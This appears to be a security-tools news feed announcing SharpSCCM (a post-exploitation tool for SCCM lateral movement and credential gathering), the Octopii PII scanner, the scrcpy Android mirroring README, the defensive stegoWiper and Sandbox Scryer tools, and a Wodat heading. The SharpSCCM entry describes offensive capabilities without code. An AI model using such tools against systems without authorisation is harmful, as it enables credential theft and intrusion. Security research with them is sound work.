There are new articles available, click to refresh the page.
Yesterday β€” 25 November 2022Tools

SharpSCCM - A C# Utility For Interacting With SCCM

By: Zion3R
25 November 2022 at 11:30

SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr, formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI.

SharpSCCM was initially created to execute user hunting and lateral movement functions ported from PowerSCCM (by @harmj0y, @jaredcatkinson, @enigma0x3, and @mattifestation) and now contains additional functionality to gather credentials and abuse newly discovered attack primitives for coercing NTLM authentication in SCCM sites where automatic site-wide client push installation is enabled.

Please visit the wiki for documentation detailing how to build and use SharpSCCM.


Chris Thompson is the primary author of this project. Duane Michael (@subat0mik) and Evan McBroom (@mcbroom_evan) are active contributors as well. Please feel free to reach out on Twitter (@_Mayyhem) with questions, ideas for improvements, etc., and on GitHub with issues and pull requests.


This tool was written as a proof of concept in a lab environment and has not been thoroughly tested. There are lots of unfinished bits, terrible error handling, and functions I may never complete. Please be careful and use at your own risk.

Before yesterdayTools

Octopii - An AI-powered Personal Identifiable Information (PII) Scanner

By: Zion3R
24 November 2022 at 11:30

Octopii is an open-source AI-powered Personal Identifiable Information (PII) scanner that can look for image assets such as Government IDs, passports, photos and signatures in a directory.


Octopii uses Tesseract's Optical Character Recognition (OCR) and Keras' Convolutional Neural Networks (CNN) models to detect various forms of personal identifiable information that may be leaked on a publicly facing location. This is done in the following steps:

1. Importing and cleaning image(s)

The image is imported via OpenCV and Python Imaging Library (PIL) and is cleaned, deskewed and rotated for scanning.

2. Performing image classification and Optical Character Recognition (OCR)

A directory is looped over and searched for images. These images are scanned for unique features via the image classifier (done by comparing it to a trained model), along with OCR for finding substrings within the image. This may have one of the following outcomes:

  • Best case (score >=90): The image is sent into the image classifier algorithm to be scanned for features such as an ISO/IEC 7810 card specification, colors, location of text, photos, holograms etc. If it is successfully classified as a type of PII, OCR is performed on it looking for particular words and strings as a final check. When both of these are confirmed, the result from Octopii is extremely reliable.

  • Average case (score >=50): The image is partially/incorrectly identified by the image classifier algorithm, but an OCR check finds contradicting substrings and reclassifies it.

  • Worst case (score >=0): The image is only identified by the image classifier algorithm but an OCR scan returns no results.

  • Incorrect classification: False positives due to a very small model or OCR list may incorrectly classify PIIs, giving inaccurate results.

As a final verification method, images are scanned for certain strings to verify the accuracy of the model.

The accuracy of the scan can determined via the confidence scores in output. If all the mentioned conditions are met, a score of 100.0 is returned.

To train the model, data can also be fed into the model_generator.py script, and the newly improved h5 file can be used.


  1. Install all dependencies via pip install -r requirements.txt.
  2. Install the Tesseract helper locally via sudo apt install tesseract-ocr -y (for Ubuntu/Debian).
  3. To run Octopii, type python3 octopii.py <location name>, for example python3 octopii.py pii_list/
python3 octopii.py <location to scan> <additional flags>

Octopii currently supports local scanning and scanning S3 directories and open directory listings via their URLs.



Open-source projects like these thrive on community support. Since Octopii relies heavily on machine learning and optical character recognition, contributions are much appreciated. Here's how to contribute:

1. Fork

Fork the official repository at https://github.com/redhuntlabs/octopii

2. Understand

There are 3 files in the models/ directory. - The keras_models.h5 file is the Keras h5 model that can be obtained from Google's Teachable Machine or via Keras in Python. - The labels.txt file contains the list of labels corresponding to the index that the model returns. - The ocr_list.json file consists of keywords to search for during an OCR scan, as well as other miscellaneous information such as country of origin, regular expressions etc.

Generating models via Teachable Machine

Since our current dataset is quite small, we could benefit from a large Keras model of international PII for this project. If you do not have expertise in Keras, Google provides an extremely easy to use model generator called the Teachable Machine. To use it:

  • Visit https://teachablemachine.withgoogle.com/train and select 'Image Project' β†’ 'Standard Image Model'.
  • A few classes are visible. Rename the class to an asset type ypu'd like to upload, such as "German Passport" or "California Driver License".
  • Add images by clicking the 'Upload' button and upload some image assets. Note: images have to be square

Tip: segregate your image assets into folders with the folder name being the same as the class name. You can then drag and drop a folder into the upload dialog.

  • Click '+ Add a class' at the bottom of the page to add more classes with data and repeat. You can make the classes more specific, such as "Goa Driver License Old Format".

Note: Only upload the same as the class name, for example, the German Passport class must have German Passport pictures. Uploading the wrong data to the wrong class will confuse the machine learning algorithms.

  • Verify the classes and images one last time. Once you're ready, click on the 'Train Model' button. You can increase the epoch size (such as 5000) to improve model accuracy.
  • To test, you can test the model by clicking the Input dropdown and selecting 'File', then uploading a sample image.
  • Once you're ready, click the 'Export Model' button. In the dialog that pops up, select the 'Tensorflow' tab (not Tensorflow.js) and select the 'Keras' radio button, then click 'Download my model' to export the newly generated model. Extract the downloaded zip file and paste the keras_model.h5 file and labels.txt file into the models/ directory in Octopii.

The images used for the model above are not visible to us since they're in a proprietary format. You can use both dummy and actual PII. Make sure they are square-ish in image size.

Updating OCR list

Once you generate models using Teachable Machine, you can improve Octopii's accuracy via OCR. To do this:

  • Open the existing ocr_list.json file. Create a JSONObject with the key having the same name as the asset class. NOTE: The key name must be exactly the same as the asset class name from Teachable Machine.
  • For the keywords, use as many unique terms from your asset as possible, such as "Income Tax Department". Store them in a JSONArray.
  • (Advanced) you can also add regexes for things like ID numbers and MRZ on passports if they are unique enough. Use https://regex101.com to test your regexes before adding them.
  • Save/overwrite the existing ocr_list.json file.

3. Edit

You can replace each file you modify in the models/ directory after you create or edit them via the above methods.

4. Pull request

Submit a pull request from your forked repo and we'll pick it up and replace our current model with it if the changes are large enough.

Note: Please take the following steps to ensure quality

  • Make sure the model returns extremely accurate results by testing it locally first.
  • Use proper text casing for label names in both the Keras model and ocr_list.json.
  • Make sure all JSON is valid with appropriate character escapes with no duplicate keys, regexes or keywords.
  • For country names, please use the ISO 3166-1 alpha-2 code of the country.



MIT License

(c) Copyright 2022 RedHunt Labs Private Limited

Author: Owais Shaikh

Scrcpy - Display And Control Your Android Device

By: Zion3R
23 November 2022 at 11:30

pronounced "screen copy"

Read in another language

This application provides display and control of Android devices connected via USB or over TCP/IP. It does not require any root access. It works on GNU/Linux, Windows and macOS.

It focuses on:

  • lightness: native, displays only the device screen
  • performance: 30~120fps, depending on the device
  • quality: 1920Γ—1080 or above
  • low latency: 35~70ms
  • low startup time: ~1 second to display the first image
  • non-intrusiveness: nothing is left installed on the Android device
  • user benefits: no account, no ads, no internet required
  • freedom: free and open source software

Its features include:


The Android device requires at least API 21 (Android 5.0).

Make sure you enable adb debugging on your device(s).

On some devices, you also need to enable an additional option to control it using a keyboard and mouse.

Get the app


  • Linux: apt install scrcpy
  • Windows: download
  • macOS: brew install scrcpy

Build from sources: BUILD (simplified process)


On Debian and Ubuntu:

apt install scrcpy

On Arch Linux:

pacman -S scrcpy

A Snap package is available: scrcpy.

For Fedora, a COPR package is available: scrcpy.

For Gentoo, an Ebuild is available: scrcpy/.

You can also build the app manually (simplified process).


For Windows, a prebuilt archive with all the dependencies (including adb) is available:

It is also available in Chocolatey:

choco install scrcpy
choco install adb # if you don't have it yet

And in Scoop:

scoop install scrcpy
scoop install adb # if you don't have it yet

You can also build the app manually.


The application is available in Homebrew. Just install it:

brew install scrcpy

You need adb, accessible from your PATH. If you don't have it yet:

brew install android-platform-tools

It's also available in MacPorts, which sets up adb for you:

sudo port install scrcpy

You can also build the app manually.


Plug an Android device into your computer, and execute:


It accepts command-line arguments, listed by:

scrcpy --help


Capture configuration

Reduce size

Sometimes, it is useful to mirror an Android device at a lower resolution to increase performance.

To limit both the width and height to some value (e.g. 1024):

scrcpy --max-size 1024
scrcpy -m 1024 # short version

The other dimension is computed so that the Android device aspect ratio is preserved. That way, a device in 1920Γ—1080 will be mirrored at 1024Γ—576.

Change bit-rate

The default bit-rate is 8 Mbps. To change the video bitrate (e.g. to 2 Mbps):

scrcpy --bit-rate 2M
scrcpy -b 2M # short version

Limit frame rate

The capture frame rate can be limited:

scrcpy --max-fps 15

This is officially supported since Android 10, but may work on earlier versions.

The actual capture framerate may be printed to the console:

scrcpy --print-fps

It may also be enabled or disabled at any time with MOD+i.


The device screen may be cropped to mirror only part of the screen.

This is useful, for example, to mirror only one eye of the Oculus Go:

scrcpy --crop 1224:1440:0:0   # 1224x1440 at offset (0,0)

If --max-size is also specified, resizing is applied after cropping.

Lock video orientation

To lock the orientation of the mirroring:

scrcpy --lock-video-orientation     # initial (current) orientation
scrcpy --lock-video-orientation=0 # natural orientation
scrcpy --lock-video-orientation=1 # 90Β° counterclockwise
scrcpy --lock-video-orientation=2 # 180Β°
scrcpy --lock-video-orientation=3 # 90Β° clockwise

This affects recording orientation.

The window may also be rotated independently.


Some devices have more than one encoder, and some of them may cause issues or crash. It is possible to select a different encoder:

scrcpy --encoder OMX.qcom.video.encoder.avc

To list the available encoders, you can pass an invalid encoder name; the error will give the available encoders:

scrcpy --encoder _



It is possible to record the screen while mirroring:

scrcpy --record file.mp4
scrcpy -r file.mkv

To disable mirroring while recording:

scrcpy --no-display --record file.mp4
scrcpy -Nr file.mkv
# interrupt recording with Ctrl+C

"Skipped frames" are recorded, even if they are not displayed in real time (for performance reasons). Frames are timestamped on the device, so packet delay variation does not impact the recorded file.


On Linux, it is possible to send the video stream to a v4l2 loopback device, so that the Android device can be opened like a webcam by any v4l2-capable tool.

The module v4l2loopback must be installed:

sudo apt install v4l2loopback-dkms

To create a v4l2 device:

sudo modprobe v4l2loopback

This will create a new video device in /dev/videoN, where N is an integer (more options are available to create several devices or devices with specific IDs).

To list the enabled devices:

# requires v4l-utils package
v4l2-ctl --list-devices

# simple but might be sufficient
ls /dev/video*

To start scrcpy using a v4l2 sink:

scrcpy --v4l2-sink=/dev/videoN
scrcpy --v4l2-sink=/dev/videoN --no-display # disable mirroring window
scrcpy --v4l2-sink=/dev/videoN -N # short version

(replace N with the device ID, check with ls /dev/video*)

Once enabled, you can open your video stream with a v4l2-capable tool:

ffplay -i /dev/videoN
vlc v4l2:///dev/videoN # VLC might add some buffering delay

For example, you could capture the video within OBS.


It is possible to add buffering. This increases latency, but reduces jitter (see #2464).

The option is available for display buffering:

scrcpy --display-buffer=50  # add 50 ms buffering for display

and V4L2 sink:

scrcpy --v4l2-buffer=500    # add 500 ms buffering for v4l2 sink


TCP/IP (wireless)

Scrcpy uses adb to communicate with the device, and adb can connect to a device over TCP/IP. The device must be connected on the same network as the computer.


An option --tcpip allows to configure the connection automatically. There are two variants.

If the device (accessible at in this example) already listens on a port (typically 5555) for incoming adb connections, then run:

scrcpy --tcpip=       # default port is 5555
scrcpy --tcpip=

If adb TCP/IP mode is disabled on the device (or if you don't know the IP address), connect the device over USB, then run:

scrcpy --tcpip    # without arguments

It will automatically find the device IP address, enable TCP/IP mode, then connect to the device before starting.


Alternatively, it is possible to enable the TCP/IP connection manually using adb:

  1. Plug the device into a USB port on your computer.

  2. Connect the device to the same Wi-Fi network as your computer.

  3. Get your device IP address, in Settings β†’ About phone β†’ Status, or by executing this command:

    adb shell ip route | awk '{print $9}'
  4. Enable adb over TCP/IP on your device: adb tcpip 5555.

  5. Unplug your device.

  6. Connect to your device: adb connect DEVICE_IP:5555 (replace DEVICE_IPwith the device IP address you found).

  7. Run scrcpy as usual.

Since Android 11, a Wireless debugging option allows to bypass having to physically connect your device directly to your computer.

If the connection randomly drops, run your scrcpy command to reconnect. If it says there are no devices/emulators found, try running adb connect DEVICE_IP:5555 again, and then scrcpy as usual. If it still says there are none found, try running adb disconnect, and then run those two commands again.

It may be useful to decrease the bit-rate and the resolution:

scrcpy --bit-rate 2M --max-size 800
scrcpy -b2M -m800 # short version


If several devices are listed in adb devices, you can specify the serial:

scrcpy --serial 0123456789abcdef
scrcpy -s 0123456789abcdef # short version

The serial may also be provided via the environment variable ANDROID_SERIAL(also used by adb).

If the device is connected over TCP/IP:

scrcpy --serial
scrcpy -s # short version

If only one device is connected via either USB or TCP/IP, it is possible to select it automatically:

# Select the only device connected via USB
scrcpy -d # like adb -d
scrcpy --select-usb # long version

# Select the only device connected via TCP/IP
scrcpy -e # like adb -e
scrcpy --select-tcpip # long version

You can start several instances of scrcpy for several devices.

Autostart on device connection

You could use AutoAdb:

autoadb scrcpy -s '{}'


To connect to a remote device, it is possible to connect a local adb client to a remote adb server (provided they use the same version of the adbprotocol).

Remote ADB server

To connect to a remote adb server, make the server listen on all interfaces:

adb kill-server
adb -a nodaemon server start
# keep this open

Warning: all communications between clients and the adb server are unencrypted.

Suppose that this server is accessible at Then, from another terminal, run scrcpy:

# in bash
scrcpy --tunnel-host=
:: in cmd
scrcpy --tunnel-host=
# in PowerShell
$env:ADB_SERVER_SOCKET = 'tcp:'
scrcpy --tunnel-host=

By default, scrcpy uses the local port used for adb forward tunnel establishment (typically 27183, see --port). It is also possible to force a different tunnel port (it may be useful in more complex situations, when more redirections are involved):

scrcpy --tunnel-port=1234
SSH tunnel

To communicate with a remote adb server securely, it is preferable to use an SSH tunnel.

First, make sure the adb server is running on the remote computer:

adb start-server

Then, establish an SSH tunnel:

# local  5038 --> remote  5037
# local 27183 <-- remote 27183
ssh -CN -L5038:localhost:5037 -R27183:localhost:27183 your_remote_computer
# keep this open

From another terminal, run scrcpy:

# in bash
export ADB_SERVER_SOCKET=tcp:localhost:5038
:: in cmd
set ADB_SERVER_SOCKET=tcp:localhost:5038
# in PowerShell
$env:ADB_SERVER_SOCKET = 'tcp:localhost:5038'

To avoid enabling remote port forwarding, you could force a forward connection instead (notice the -L instead of -R):

# local  5038 --> remote  5037
# local 27183 --> remote 27183
ssh -CN -L5038:localhost:5037 -L27183:localhost:27183 your_remote_computer
# keep this open

From another terminal, run scrcpy:

# in bash
export ADB_SERVER_SOCKET=tcp:localhost:5038
scrcpy --force-adb-forward
:: in cmd
set ADB_SERVER_SOCKET=tcp:localhost:5038
scrcpy --force-adb-forward
# in PowerShell
$env:ADB_SERVER_SOCKET = 'tcp:localhost:5038'
scrcpy --force-adb-forward

Like for wireless connections, it may be useful to reduce quality:

scrcpy -b2M -m800 --max-fps 15

Window configuration


By default, the window title is the device model. It can be changed:

scrcpy --window-title 'My device'

Position and size

The initial window position and size may be specified:

scrcpy --window-x 100 --window-y 100 --window-width 800 --window-height 600


To disable window decorations:

scrcpy --window-borderless

Always on top

To keep the scrcpy window always on top:

scrcpy --always-on-top


The app may be started directly in fullscreen:

scrcpy --fullscreen
scrcpy -f # short version

Fullscreen can then be toggled dynamically with MOD+f.


The window may be rotated:

scrcpy --rotation 1

Possible values:

  • 0: no rotation
  • 1: 90 degrees counterclockwise
  • 2: 180 degrees
  • 3: 90 degrees clockwise

The rotation can also be changed dynamically with MOD+←(left) and MOD+β†’ (right).

Note that scrcpy manages 3 different rotations:

  • MOD+r requests the device to switch between portrait and landscape (the current running app may refuse, if it does not support the requested orientation).
  • --lock-video-orientation changes the mirroring orientation (the orientation of the video sent from the device to the computer). This affects the recording.
  • --rotation (or MOD+←/MOD+β†’) rotates only the window content. This affects only the display, not the recording.

Other mirroring options


To disable controls (everything which can interact with the device: input keys, mouse events, drag&drop files):

scrcpy --no-control
scrcpy -n


If several displays are available, it is possible to select the display to mirror:

scrcpy --display 1

The list of display ids can be retrieved by:

adb shell dumpsys display   # search "mDisplayId=" in the output

The secondary display may only be controlled if the device runs at least Android 10 (otherwise it is mirrored as read-only).

Stay awake

To prevent the device from sleeping after a delay when the device is plugged in:

scrcpy --stay-awake
scrcpy -w

The initial state is restored when scrcpy is closed.

Turn screen off

It is possible to turn the device screen off while mirroring on start with a command-line option:

scrcpy --turn-screen-off
scrcpy -S

Or by pressing MOD+o at any time.

To turn it back on, press MOD+Shift+o.

On Android, the POWER button always turns the screen on. For convenience, if POWER is sent via scrcpy (via right-click or MOD+p), it will force to turn the screen off after a small delay (on a best effort basis). The physical POWER button will still cause the screen to be turned on.

It can also be useful to prevent the device from sleeping:

scrcpy --turn-screen-off --stay-awake
scrcpy -Sw

Power off on close

To turn the device screen off when closing scrcpy:

scrcpy --power-off-on-close

Power on on start

By default, on start, the device is powered on.

To prevent this behavior:

scrcpy --no-power-on

Show touches

For presentations, it may be useful to show physical touches (on the physical device).

Android provides this feature in Developers options.

Scrcpy provides an option to enable this feature on start and restore the initial value on exit:

scrcpy --show-touches
scrcpy -t

Note that it only shows physical touches (by a finger on the device).

Disable screensaver

By default, scrcpy does not prevent the screensaver from running on the computer.

To disable it:

scrcpy --disable-screensaver

Input control

Rotate device screen

Press MOD+r to switch between portrait and landscape modes.

Note that it rotates only if the application in foreground supports the requested orientation.


Any time the Android clipboard changes, it is automatically synchronized to the computer clipboard.

Any Ctrl shortcut is forwarded to the device. In particular:

  • Ctrl+c typically copies
  • Ctrl+x typically cuts
  • Ctrl+v typically pastes (after computer-to-device clipboard synchronization)

This typically works as you expect.

The actual behavior depends on the active application though. For example, Termux sends SIGINT on Ctrl+c instead, and K-9 Mailcomposes a new message.

To copy, cut and paste in such cases (but only supported on Android >= 7):

  • MOD+c injects COPY
  • MOD+x injects CUT
  • MOD+v injects PASTE (after computer-to-device clipboard synchronization)

In addition, MOD+Shift+v injects the computer clipboard text as a sequence of key events. This is useful when the component does not accept text pasting (for example in Termux), but it can break non-ASCII content.

WARNING: Pasting the computer clipboard to the device (either via Ctrl+v or MOD+v) copies the content into the Android clipboard. As a consequence, any Android application could read its content. You should avoid pasting sensitive content (like passwords) that way.

Some Android devices do not behave as expected when setting the device clipboard programmatically. An option --legacy-paste is provided to change the behavior of Ctrl+v and MOD+v so that they also inject the computer clipboard text as a sequence of key events (the same way as MOD+Shift+v).

To disable automatic clipboard synchronization, use --no-clipboard-autosync.


To simulate "pinch-to-zoom": Ctrl+click-and-move.

More precisely, hold down Ctrl while pressing the left-click button. Until the left-click button is released, all mouse movements scale and rotate the content (if supported by the app) relative to the center of the screen.

Technically, scrcpy generates additional touch events from a "virtual finger" at a location inverted through the center of the screen.

Physical keyboard simulation (HID)

By default, scrcpy uses Android key or text injection: it works everywhere, but is limited to ASCII.

Alternatively, scrcpy can simulate a physical USB keyboard on Android to provide a better input experience (using USB HID over AOAv2): the virtual keyboard is disabled and it works for all characters and IME.

However, it only works if the device is connected via USB.

Note: On Windows, it may only work in OTG mode, not while mirroring (it is not possible to open a USB device if it is already open by another process like the adb daemon).

To enable this mode:

scrcpy --hid-keyboard
scrcpy -K # short version

If it fails for some reason (for example because the device is not connected via USB), it automatically fallbacks to the default mode (with a log in the console). This allows using the same command line options when connected over USB and TCP/IP.

In this mode, raw key events (scancodes) are sent to the device, independently of the host key mapping. Therefore, if your keyboard layout does not match, it must be configured on the Android device, in Settings β†’ System β†’ Languages and input β†’ Physical keyboard.

This settings page can be started directly:

adb shell am start -a android.settings.HARD_KEYBOARD_SETTINGS

However, the option is only available when the HID keyboard is enabled (or when a physical keyboard is connected).

Physical mouse simulation (HID)

Similarly to the physical keyboard simulation, it is possible to simulate a physical mouse. Likewise, it only works if the device is connected by USB.

By default, scrcpy uses Android mouse events injection with absolute coordinates. By simulating a physical mouse, a mouse pointer appears on the Android device, and relative mouse motion, clicks and scrolls are injected.

To enable this mode:

scrcpy --hid-mouse
scrcpy -M # short version

You can also add --forward-all-clicks to forward all mouse buttons.

When this mode is enabled, the computer mouse is "captured" (the mouse pointer disappears from the computer and appears on the Android device instead).

Special capture keys, either Alt or Super, toggle (disable or enable) the mouse capture. Use one of them to give the control of the mouse back to the computer.


It is possible to run scrcpy with only physical keyboard and mouse simulation (HID), as if the computer keyboard and mouse were plugged directly to the device via an OTG cable.

In this mode, adb (USB debugging) is not necessary, and mirroring is disabled.

To enable OTG mode:

scrcpy --otg
# Pass the serial if several USB devices are available
scrcpy --otg -s 0123456789abcdef

It is possible to enable only HID keyboard or HID mouse:

scrcpy --otg --hid-keyboard              # keyboard only
scrcpy --otg --hid-mouse # mouse only
scrcpy --otg --hid-keyboard --hid-mouse # keyboard and mouse
# for convenience, enable both by default
scrcpy --otg # keyboard and mouse

Like --hid-keyboard and --hid-mouse, it only works if the device is connected by USB.

Text injection preference

Two kinds of events are generated when typing text:

  • key events, signaling that a key is pressed or released;
  • text events, signaling that a text has been entered.

By default, letters are injected using key events, so that the keyboard behaves as expected in games (typically for WASD keys).

But this may cause issues. If you encounter such a problem, you can avoid it by:

scrcpy --prefer-text

(but this will break keyboard behavior in games)

On the contrary, you could force to always inject raw key events:

scrcpy --raw-key-events

These options have no effect on HID keyboard (all key events are sent as scancodes in this mode).

Key repeat

By default, holding a key down generates repeated key events. This can cause performance problems in some games, where these events are useless anyway.

To avoid forwarding repeated key events:

scrcpy --no-key-repeat

This option has no effect on HID keyboard (key repeat is handled by Android directly in this mode).

Right-click and middle-click

By default, right-click triggers BACK (or POWER on) and middle-click triggers HOME. To disable these shortcuts and forward the clicks to the device instead:

scrcpy --forward-all-clicks

File drop

Install APK

To install an APK, drag & drop an APK file (ending with .apk) to the scrcpywindow.

There is no visual feedback, a log is printed to the console.

Push file to device

To push a file to /sdcard/Download/ on the device, drag & drop a (non-APK) file to the scrcpy window.

There is no visual feedback, a log is printed to the console.

The target directory can be changed on start:

scrcpy --push-target=/sdcard/Movies/

Audio forwarding

Audio is not forwarded by scrcpy. Use sndcpy.

Also see issue #14.


In the following list, MOD is the shortcut modifier. By default, it's (left) Alt or (left) Super.

It can be changed using --shortcut-mod. Possible keys are lctrl, rctrl, lalt, ralt, lsuper and rsuper. For example:

# use RCtrl for shortcuts
scrcpy --shortcut-mod=rctrl

# use either LCtrl+LAlt or LSuper for shortcuts
scrcpy --shortcut-mod=lctrl+lalt,lsuper

Super is typically the Windows or Cmd key.

Action Shortcut
Switch fullscreen mode MOD+f
Rotate display left MOD+← (left)
Rotate display right MOD+β†’ (right)
Resize window to 1:1 (pixel-perfect) MOD+g
Resize window to remove black borders MOD+w | Double-left-clickΒΉ
Click on HOME MOD+h | Middle-click
Click on BACK MOD+b | Right-clickΒ²
Click on APP_SWITCH MOD+s | 4th-clickΒ³
Click on MENU (unlock screen)⁴ MOD+m
Click on VOLUME_UP MOD+↑ (up)
Click on VOLUME_DOWN MOD+↓ (down)
Click on POWER MOD+p
Power on Right-clickΒ²
Turn device screen off (keep mirroring) MOD+o
Turn device screen on MOD+Shift+o
Rotate device screen MOD+r
Expand notification panel MOD+n | 5th-clickΒ³
Expand settings panel MOD+n+n | Double-5th-clickΒ³
Collapse panels MOD+Shift+n
Copy to clipboard⁡ MOD+c
Cut to clipboard⁡ MOD+x
Synchronize clipboards and paste⁡ MOD+v
Inject computer clipboard text MOD+Shift+v
Enable/disable FPS counter (on stdout) MOD+i
Pinch-to-zoom Ctrl+click-and-move
Drag & drop APK file Install APK from computer
Drag & drop non-APK file Push file to device

ΒΉDouble-click on black borders to remove them.
Β²Right-click turns the screen on if it was off, presses BACK otherwise.
Β³4th and 5th mouse buttons, if your mouse has them.
⁴For react-native apps in development, MENU triggers development menu.
⁡Only on Android >= 7.

Shortcuts with repeated keys are executed by releasing and pressing the key a second time. For example, to execute "Expand settings panel":

  1. Press and keep pressing MOD.
  2. Then double-press n.
  3. Finally, release MOD.

All Ctrl+key shortcuts are forwarded to the device, so they are handled by the active application.

Custom paths

To use a specific adb binary, configure its path in the environment variable ADB:

ADB=/path/to/adb scrcpy

To override the path of the scrcpy-server file, configure its path in SCRCPY_SERVER_PATH.

To override the icon, configure its path in SCRCPY_ICON_PATH.

Why the name scrcpy?

A colleague challenged me to find a name as unpronounceable as gnirehtet.

strcpy copies a string; scrcpy copies a screen.

How to build?


Common issues

See the FAQ.


Read the developers page.




If you encounter a bug, please read the FAQ first, then open an issue.

For general questions or discussions, you can also use:


Translations of this README in other languages are available in the wiki.

Only this README file is guaranteed to be up-to-date.

Stegowiper - A Powerful And Flexible Tool To Apply Active Attacks For Disrupting Stegomalware

By: Zion3R
22 November 2022 at 11:30

Over the last 10 years, many threat groups have employed stegomalware or other steganography-based techniques to attack organizations from all sectors and in all regions of the world. Some examples are: APT15/Vixen Panda, APT23/Tropic Trooper, APT29/Cozy Bear, APT32/OceanLotus, APT34/OilRig, APT37/ScarCruft, APT38/Lazarus Group, Duqu Group, Turla, Vawtrack, Powload, Lokibot, Ursnif, IceID, etc.

Our research (see APTs/) shows that most groups are employing very simple techniques (at least from an academic perspective) and known tools to circumvent perimeter defenses, although more advanced groups are also using steganography to hide C&C communication and data exfiltration. We argue that this lack of sophistication is not due to the lack of knowledge in steganography (some APTs, like Turla, have already experimented with advanced algorithms), but simply because organizations are not able to defend themselves, even against the simplest steganography techniques.

For this reason, we have created stegoWiper, a tool to blindly disrupt any image-based stegomalware, by attacking the weakest point of all steganography algorithms: their robustness. We have checked that it is capable of disrupting all steganography techniques and tools (Invoke-PSImage, F5, Steghide, openstego, ...) employed nowadays, as well as the most advanced algorithms available in the academic literature, based on matrix encryption, wet-papers, etc. (e.g. Hill, J-Uniward, Hugo). In fact, the more sophisticated a steganography technique is, the more disruption stegoWiper produces.

Moreover, our active attack allows us to disrupt any steganography payload from all the images exchanged by an organization by means of a web proxy ICAP (Internet Content Adaptation Protocol) service (see c-icap/), in real time and without having to identify whether the images contain hidden data first.

Usage & Parameters

stegoWiper v0.1 - Cleans stego information from image files
(png, jpg, gif, bmp, svg)

Usage: ${myself} [-hvc <comment>] <input file> <output file>

-h Show this message and exit
-v Verbose mode
-c <comment> Add <comment> to output image file

Examples - Breaking steganography

stegowiper.sh -c "stegoWiped" ursnif.png ursnif_clean.png

The examples/ directory includes several base images that have been employed to hide secret information using different steganography algorithms, as well as the result of cleanign them with stegoWiper.

How it works?

stegoWiper removes all metadata comments from the input file, and also adds some imperceptible noise to the image (it doesn't matter if it really includes a hidden payload or not). If the image does contain a steganographic payload, this random noise alters it, so if you try to extract it, it will either fail or be corrupted, so steganomalware fails to execute.

We have tested several kinds (Uniform, Poisson, Laplacian, Impulsive, Multiplicative) and levels of noise, and the best one in terms of payload disruption and reducing the impact on the input image is the Gaussian one (see tests/ for a summary of our experiments). It is also worth noting that, since the noise is random and distributed all over the image, attackers cannot know how to avoid it. This is important because other authors have proposed deterministic alterations (such as clearing the least significant bit of all pixels), so the attackers can easily bypass them (e.g. just by using the second least significaby bit).

Author & license

This project has been developed by Dr. Alfonso MuΓ±oz and Dr. Manuel UrueΓ±a The code is released under the GNU General Public License v3.

Sandbox_Scryer - Tool For Producing Threat Hunting And Intelligence Data From Public Sandbox Detonation Output

By: Zion3R
21 November 2022 at 12:30

The Sandbox Scryer is an open-source tool for producing threat hunting and intelligence data from public sandbox detonation output The tool leverages the MITRE ATT&CK Framework to organize and prioritize findings, assisting in the assembly of IOCs, understanding attack movement and in threat hunting By allowing researchers to send thousands of samples to a sandbox for building a profile that can be used with the ATT&CK technique, the Sandbox Scryer delivers an unprecedented ability to solve use cases at scale The tool is intended for cybersecurity professionals who are interested in threat hunting and attack analysis leveraging sandbox output data. The Sandbox Scryer tool currently consumes output from the free and public Hybrid Analysis malware analysis service helping analysts expedite and scale threat hunting

Repository contents

[root] version.txt - Current tool version LICENSE - Defines license for source and other contents README.md - This file

[root\bin] \Linux - Pre-build binaries for running tool in Linux. Currently supports: Ubuntu x64 \MacOS - Pre-build binaries for running tool in MacOS. Currently supports: OSX 10.15 x64 \Windows - Pre-build binaries for running tool in Windows. Currently supports: Win10 x64

[root\presentation_video] Sandbox_Scryer__BlackHat_Presentation_and_demo.mp4 - Video walking through slide deck and showing demo of tool

[root\screenshots_and_videos] Various backing screenshots

[root\scripts] Parse_report_set.* - Windows PowerShell and DOS Command Window batch file scripts that invoke tool to parse each HA Sandbox report summary in test set Collate_Results.* - Windows PowerShell and DOS Command Window batch file scripts that invoke tool to collate data from parsing report summaries and generate a MITRE Navigator layer file

[root\slides] BlackHat_Arsenal_2022__Sandbox_Scryer__BH_template.pdf - PDF export of slides used to present the Sandbox Scryer at Black Hat 2022

[root\src] Sandbox_Scryer - Folder with source for Sandbox Scryer tool (in c#) and Visual Studio 2019 solution file

[root\test_data] (SHA256 filenames).json - Report summaries from submissions to Hybrid Analysis enterprise-attack__062322.json - MITRE CTI data TopAttackTechniques__High__060922.json - Top MITRE ATT&CK techniques generated with the MITRE calculator. Used to rank techniques for generating heat map in MITRE Navigator

[root\test_output] (SHA256)_report__summary_Error_Log.txt - Errors (if any) encountered while parsing report summary for SHA256 included in name (SHA256)_report__summary_Hits__Complete_List.png - Graphic showing tecniques noted while parsing report summary for SHA256 included in name (SHA256)_report__summary_MITRE_Attck_Hits.csv - For collation step, techniques and tactics with select metadata from parsing report summary for SHA256 included in name (SHA256)_report__summary_MITRE_Attck_Hits.txt - More human-readable form of .csv file. Includes ranking data of noted techniques

\collated_data collated_080122_MITRE_Attck_Heatmap.json - Layer file for import into MITRE Navigator


The Sandbox Scryer is intended to be invoked as a command-line tool, to facilitate scripting

Operation consists of two steps:

  • Parsing, where a specified report summary is parsed to extract the output noted earlier
  • Collation, where the data from the set of parsing results from the parsing step is collated to produce a Navigator layer file

Invocation examples:

  • Parsing

  • Collation

If the parameter "-h" is specified, the built-in help is displayed as shown here Sandbox_Scryer.exe -h

-h Display command-line options
-i Input filepath
-ita Input filepath - MITRE report for top techniques
-o Output folder path
-ft Type of file to submit
-name Name to use with output
-sb_name Identifier of sandbox to use (default: ha)
-api_key API key to use with submission to sandbox
-env_id Environment ID to use with submission to sandbox
-inc_sub Include sub-techniques in graphical output (default is to not include)
-mitre_data Filepath for mitre cti data to parse (to populate att&ck techniques)
-cmd Command
parse Process report file from prior sandbox submission
Uses -i, -ita, - o, -name, -inc_sub, -sig_data parameters
col Collates report data from prior sandbox submissions
Uses -i (treated as folder path), -ita, -o, -name, -inc_sub, -mitre_data parameters

Once the Navigator layer file is produced, it may be loaded into the Navigator for viewing via https://mitre-attack.github.io/attack-navigator/

Within the Navigator, techniques noted in the sandbox report summaries are highlighted and shown with increased heat based on a combined scoring of the technique ranking and the count of hits on the technique in the sandbox report summaries. Howevering of techniques will show select metadata.

Wodat - Windows Oracle Database Attack Toolkit

By: Zion3R
19 November 2022 at 11:30

